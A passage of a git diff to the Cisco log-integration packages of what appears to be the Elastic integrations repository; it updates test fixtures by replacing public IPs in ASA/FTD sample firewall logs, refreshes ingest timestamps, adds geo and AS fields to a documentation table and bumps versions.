+1026,7 @@ }, "message": "lor nvolupt.dquia ora_ security_event dipi security_event ecatc signature=quovolu priority=ite timestamp=1559018911.itse shost=01:00:5e:b8:73:c8 direction=external protocol=icmp src=10.199.103.185:2449 dst=10.51.121.223:24 message:stenat", "event": { - "ingested": "2021-07-19T09:06:57.318521638Z" + "ingested": "2021-12-09T13:33:18.888954Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "saq 1560253866.asiarch ssuscipi events MAC 01:00:5e:93:48:61 and MAC 01:00:5e:21:c2:55 both claim IP: 10.126.242.58", "event": { - "ingested": "2021-07-19T09:06:57.318523521Z" + "ingested": "2021-12-09T13:33:18.888957600Z" }, "tags": [ "preserve_original_event" @@ -1050,7 +1050,7 @@ }, "message": "tlab 1561488820.vel ionevo events dhcp release for mac 01:00:5e:8a:1a:f9", "event": { - "ingested": "2021-07-19T09:06:57.318525448Z" + "ingested": "2021-12-09T13:33:18.888962Z" }, "tags": [ "preserve_original_event" @@ -1062,7 +1062,7 @@ }, "message": "aeab 1562723774.uradipis aerat_ flows uira flows deny src=10.121.37.244 dst=10.113.152.241 mac=01:00:5e:9c:86:62 protocol=udp type=utaliqui ", "event": { - "ingested": "2021-07-19T09:06:57.318527459Z" + "ingested": "2021-12-09T13:33:18.888966100Z" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ }, "message": "nesciu 1563958728.mali roinBCSe_appliance events aid=eetdolor arp_resp=tpersp arp_src=assi auth_neg_dur=rch auth_neg_failed=psa channel=nreprehe dns_req_rtt=pidatatn dns_resp=isno dns_server=luptatev duration=39.622000 full_conn=lla identity=urau ip_resp=aeca ip_src=10.247.118.132 is_8021x=atcupi is_wpa=enima last_auth_ago=uptateve radio=fugitsed reason=lumqui rssi=ectet type=ionu vap=eratv client_mac=01:00:5e:10:8b:c3 client_ip=10.153.33.99 instigator=liq http_resp=xerc dhcp_lease_completed=atisetqu dhcp_ip=squir dhcp_server=gnaaliq dhcp_server_mac=quam dhcp_resp=deriti url=https://www5.example.org/eturadi/umS.txt?mSecti=henderi#taevitae category0=tevel server=10.254.96.130 vpn_type=ita connectivity=iquipexe", "event": { - "ingested": "2021-07-19T09:06:57.318529398Z" + "ingested": "2021-12-09T13:33:18.888970500Z" }, "tags": [ "preserve_original_event" @@ -1086,7 +1086,7 @@ }, "message": "tot 1565193683.reme emeumfu events aid=inBCSedu arp_resp=ita arp_src=ade auth_neg_dur=nihilmol auth_neg_failed=nder channel=ano dns_req_rtt=rumexer dns_resp=eab dns_server=iaconseq duration=18.963000 full_conn=eli identity=rissusci ip_resp=ectetur ip_src=10.101.13.122 is_8021x=oconsequ is_wpa=roqui last_auth_ago=oluptate radio=ntut reason=mremaper rssi=uteirur type=ntium vap=ide client_mac=01:00:5e:95:ae:d0 client_ip=10.78.143.52 instigator=ntiumdol http_resp=conse dhcp_lease_completed=aturve dhcp_ip=edqui dhcp_server=tvolu dhcp_server_mac=psu dhcp_resp=strud url=https://internal.example.org/fdeFi/ratv.htm?sequatu=tiumtot#tate category0=udanti server=10.200.98.243 vpn_type=cteturad connectivity=umq", "event": { - "ingested": "2021-07-19T09:06:57.318531386Z" + "ingested": "2021-12-09T13:33:18.888976Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "oinvento 1566428637.mporin orissusc_appliance events content_filtering_block url='https://www5.example.net/uov/pariat.htm?litsed=lumd#tiaec' category0='lorem' server='10.247.205.185:7676' client_mac='01:00:5e:6f:21:c8'", "event": { - "ingested": "2021-07-19T09:06:57.318533416Z" + "ingested": "2021-12-09T13:33:18.888980700Z" }, "tags": [ "preserve_original_event" @@ -1110,7 +1110,7 @@ }, "message": "metMa emoen.ptate mipsumqu_ ids-alerts ccusa ids-alerts signature=billo priority=doloremi timestamp=1567663591.ectetura dhost=01:00:5e:0a:88:bb direction=inbound protocol=ipv6 src=10.195.90.73:3914 dst=10.147.165.30:7662 message: idents", "event": { - "ingested": "2021-07-19T09:06:57.318535344Z" + "ingested": "2021-12-09T13:33:18.888983900Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "veniamqu 1568898545.iconsequ ueporr_appliance events IDS: empor", "event": { - "ingested": "2021-07-19T09:06:57.318537217Z" + "ingested": "2021-12-09T13:33:18.888988Z" }, "tags": [ "preserve_original_event" @@ -1134,7 +1134,7 @@ }, "message": "atDuisa mipsa.uas iat ids-alerts signature=hite priority=adipis timestamp=1570133500.abo dhost=01:00:5e:dd:cb:5b direction=inbound protocol=udp src=10.137.166.97 dst=10.162.202.14 message: ipsaqua", "event": { - "ingested": "2021-07-19T09:06:57.318539100Z" + "ingested": "2021-12-09T13:33:18.888993200Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "deom 1571368454.tiumdo rautod_appliance events content_filtering_block url='https://www5.example.com/illoinve/etcon.htm?nevolup=erspici#itinvolu' category0='adeserun' server='10.227.135.142:6598'", "event": { - "ingested": "2021-07-19T09:06:57.318541440Z" + "ingested": "2021-12-09T13:33:18.888998300Z" }, "tags": [ "preserve_original_event" @@ -1158,7 +1158,7 @@ }, "message": "orese 1572603408.umdolore umqui_appliance events MAC 01:00:5e:f1:b8:3a and MAC 01:00:5e:37:9c:af both claim IP: 10.199.29.19", "event": { - "ingested": "2021-07-19T09:06:57.318543577Z" + "ingested": "2021-12-09T13:33:18.889002Z" }, "tags": [ "preserve_original_event" @@ -1170,7 +1170,7 @@ }, "message": "explicab 1573838362.samvolu teiru_appliance events dhcp no offers for mac 01:00:5e:b8:06:92", "event": { - "ingested": "2021-07-19T09:06:57.318545452Z" + "ingested": "2021-12-09T13:33:18.889006100Z" }, "tags": [ "preserve_original_event" @@ -1182,7 +1182,7 @@ }, "message": "rissusci 1575073317.uaturQ iusmod_ events aid=mips arp_resp=iduntutl arp_src=mipsumd auth_neg_dur=eiusmo auth_neg_failed=quelauda channel=rcit dns_req_rtt=dolo dns_resp=ulamc dns_server=doe duration=10.574000 full_conn=remquela identity=toreve ip_resp=squirat ip_src=10.85.59.172 is_8021x=mto is_wpa=iae last_auth_ago=dent radio=Uten reason=tatiset rssi=sequat type=modoco vap=beataevi client_mac=01:00:5e:92:d8:95 client_ip=10.158.215.216 instigator=deritin http_resp=ptate dhcp_lease_completed=lloi dhcp_ip=nseq dhcp_server=equunt dhcp_server_mac=tutla dhcp_resp=usmod url=https://example.com/qui/itse.gif?orsitame=tasn#exeaco category0=upta server=10.75.122.111 vpn_type=reprehe connectivity=deFinib", "event": { - "ingested": "2021-07-19T09:06:57.318547323Z" + "ingested": "2021-12-09T13:33:18.889011200Z" }, "tags": [ "preserve_original_event" @@ -1194,7 +1194,7 @@ }, "message": "orr 1576308271.pre aute events IDS: rchite", "event": { - "ingested": "2021-07-19T09:06:57.318549217Z" + "ingested": "2021-12-09T13:33:18.889015300Z" }, "tags": [ "preserve_original_event" diff --git a/packages/cisco/docs/README.md b/packages/cisco/docs/README.md index 9321e5b4d8a..be665e2a1f1 100644 --- a/packages/cisco/docs/README.md +++ b/packages/cisco/docs/README.md @@ -811,10 +811,13 @@ An example event for `ios` looks as following: | destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | destination.as.organization.name | Organization name. | keyword | +| destination.geo.city_name | City name. | keyword | | destination.geo.continent_name | Name of the continent. | keyword | | destination.geo.country_iso_code | Country ISO code. | keyword | | destination.geo.country_name | Country name. | keyword | | destination.geo.location | Longitude and latitude. | geo_point | +| destination.geo.region_iso_code | Region ISO code. | keyword | +| destination.geo.region_name | Region name. | keyword | | destination.ip | IP address of the destination (IPv4 or IPv6). | ip | | destination.port | Port of the destination. | long | | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | @@ -872,6 +875,15 @@ An example event for `ios` looks as following: | related.ip | All of the IPs seen on your event. | ip | | related.user | All the user names or other user identifiers seen on the event. | keyword | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| source.as.organization.name | Organization name. | keyword | +| source.geo.city_name | City name. | keyword | +| source.geo.continent_name | Name of the continent. | keyword | +| source.geo.country_iso_code | Country ISO code. | keyword | +| source.geo.country_name | Country name. | keyword | +| source.geo.location | Longitude and latitude. | geo_point | +| source.geo.region_iso_code | Region ISO code. | keyword | +| source.geo.region_name | Region name. | keyword | | source.ip | IP address of the source (IPv4 or IPv6). | ip | | source.packets | Packets sent from the source to the destination. | long | | source.port | Port of the source. | long | diff --git a/packages/cisco/manifest.yml b/packages/cisco/manifest.yml index 3a002b9a62a..2ea35bb6595 100644 --- a/packages/cisco/manifest.yml +++ b/packages/cisco/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco title: Cisco -version: 0.12.3 +version: 0.12.4 license: basic description: Deprecated. Use a specific Cisco package instead. type: integration diff --git a/packages/cisco_asa/_dev/deploy/docker/sample_logs/cisco-asa.log b/packages/cisco_asa/_dev/deploy/docker/sample_logs/cisco-asa.log index 0cc07d2623f..b465e2da68d 100644 --- a/packages/cisco_asa/_dev/deploy/docker/sample_logs/cisco-asa.log +++ b/packages/cisco_asa/_dev/deploy/docker/sample_logs/cisco-asa.log @@ -1 +1 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256 diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml index 36d1c7a33e0..38d06dc133f 100644 --- a/packages/cisco_asa/changelog.yml +++ b/packages/cisco_asa/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log index 0c3aef67223..2c96d1eec05 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log @@ -1,38 +1,38 @@ -May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500) -May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500) -May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3 +May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500) +May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500) +May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3 May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00 May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2 -May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1 -May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111) +May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1 +May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111) May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443) May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67 May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4 -May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872. -May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0 +May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872. +May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0 May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10 May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00 -May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0 -May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3 +May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0 +May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3 May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I -May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839) +May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839) May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00 May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006 May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111 -May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585 -May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638) -May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638) +May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585 +May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638) +May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638) May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group "out1111_access_out" [0x47e21ef4, 0x47e21ef4] May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111 May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111 -May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051) -May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051) -May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051) May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief @@ -40,10 +40,10 @@ May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -> fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000] May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -> fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000] May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner -May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8) +May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144) May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985 May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout -May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123) +May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123) May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0) May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063 May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2 @@ -52,9 +52,9 @@ Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http: Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0] Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/ -Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout +Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group "global_access_1" -Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000] +Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000] Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear' Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15 @@ -62,24 +62,24 @@ Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user "admin" Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin -Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d -Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested +Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d +Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested Apr 27 02:03:03 dev01: %ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session -Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested. +Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested. Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout. -Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23 -Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally -Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514 -Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412 -Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number -Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created. -Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted. -Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request -Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database -Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88) -Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet. -Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable! +Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23 +Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally +Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514 +Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412 +Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number +Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created. +Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted. +Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request +Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database +Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88) +Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet. +Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, 